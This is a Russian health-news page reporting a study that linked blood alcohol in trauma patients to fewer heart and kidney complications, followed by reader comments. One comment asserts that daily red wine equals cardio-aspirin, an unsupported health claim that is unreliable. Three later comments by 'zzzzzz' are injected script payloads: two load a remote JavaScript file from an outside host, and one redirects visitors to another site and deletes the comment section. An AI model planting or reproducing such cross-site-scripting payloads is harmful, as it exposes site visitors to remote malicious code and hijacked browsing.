Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что пьяному хорошо, трезв...  >>  Что пьяному хорошо, трезвому – смерть! Оказывается, алкоголь защищает от травм!
 
Обратная связь
 

Что пьяному хорошо, трезвому – смерть! Оказывается, алкоголь защищает от травм!

Размер шрифта
26 декабря 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Как оказалось, пьяные и трезвые люди по-разному реагируют на полученные травмы: ученые обнаружили, что некоторое количество алкоголя в крови, возможно, снижает риск развития посттравматических осложнений.

Что пьяному хорошо, трезвому – смерть! Оказывается, алкоголь защищает от травм!

У пациентов с травмами меньше шансов получить повреждение сердца и почек, если у них повышен уровень алкоголя в крови. К такому неожиданному выводу пришли ученые из Университета Иллинойса. «После травмы алкогольная интоксикация, возможно, оказывает некоторый защитный эффект», – рассказывает Ли Фридман, автор исследования. «Но мы пока не до конца понимаем, почему это происходит».

Для того чтобы лучше понять этот феномен, Фридман изучил, от каких именно осложнений после травм чаще всего умирают в больницах, а также проследил уровень алкоголя в крови у всех пациентов. Согласно данным более ранних исследований, около 64% всех посттравматических летальных исходов происходят по причине определенных медицинских осложнений.

В исследование были включены данные 85 000 пациентов с травмами, которым был проведен анализ на уровень алкоголя в крови. Ученые собрали данные травматологических отделений больниц штата Иллинойс за десять лет. Дети до 16 лет, а также больные с ожогами и поверхностными ранами были исключены из исследования. Уровень алкоголя в крови пациентов составил от 0 до 0,5%. 0,5% – количество, угрожающее жизни человека, оно более чем в шесть раз превышает разрешенный в Соединенных Штатах уровень.

3,2% пациентов, включенных в исследование, погибли. Смертность была значительно выше среди тех, у кого были диагностированы посттравматические осложнения: среди погибших у 43,2% было выявлено как минимум одно. Однако наличие алкоголя в крови оказалось связано с меньшим риском развития осложнений. У таких пациентов осложнения, связанные с сердечно-сосудистой системой, встречались на 23,5% реже, а связанные с почками – реже на 30%. «Хотя алкоголь довольно быстро разлагается организмом, защитный эффект сохраняется гораздо дольше», – говорит Фридман.

Он также отмечает, что пока неясно, появляется ли защитный эффект сразу после получения травмы, когда алкоголь еще присутствует в крови, или же защита обусловлена продуктами его обмена, а также реакцией организма как на алкоголь, так и на саму травму. «Пока наши данные говорят об уменьшении количества осложнений на сердце и почки, но необходимо провести еще много исследований, чтобы понять, как именно это работает», – добавляет Фридман.

Однако не стоит, разумеется, считать все вышесказанное поводом лишний раз выпить – ведь исследования только начались, а вредное влияние алкоголя известно уже очень давно.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

26 декабря 2014 в 10:03

Цитировать   |   Пожаловаться

Да что вы такое говорите.
Французы, известные потребители качественных вин, ещё в 80- 90 гг проводили исследования о влиянии алкоголя на человека.(Почему знаю- занималась этим вопросом с химической точки зрения)
И, как ни странно- японцы- вот уж кого не заподозришь в предвзятости.
Так вот, было выяснено, что 100 млл красного вина в день, перед обедом действуют так же, как рекламируемый Малышевой кардиоаспирин.
Более того, благодаря тому, что вино не подвергается никакой термообработке в нём остаются все витамины, ну, и конечно, минералы.
Достаточно взнлянуть на продолжительность жизни французов и японцев- одна из самых высоких в мире.
Так шта....всё хорошо, но в меру, как говорил Джавахарлал Неру.

2 - his shadow

26 декабря 2014 в 20:14

Комментарий удален за нарушение Правил общения

3 - his shadow

14 января 2015 в 19:52

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:22

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы об алкоголе   Лучшая еда и напитки при похмелье   Этот сок – лучший для похмелья!   Лекарства, которые помогут бросить пить  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 27 июля 2011В Москве за полгода от запоев погибли более 1000 человек
 
04 декабря 2012Ресвератрол не обладает полезным действием 12 августа 2011Только четверть россиян не пьет
 

Слайдшоу

1
Алкогольные напитки, которые заставят вас потолстеть!
Как студенческая жизнь влияет на здоровье
Мифы о похмелье

Тесты

1
Есть ли у вас остеопороз?
Что вы знаете о цистите?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.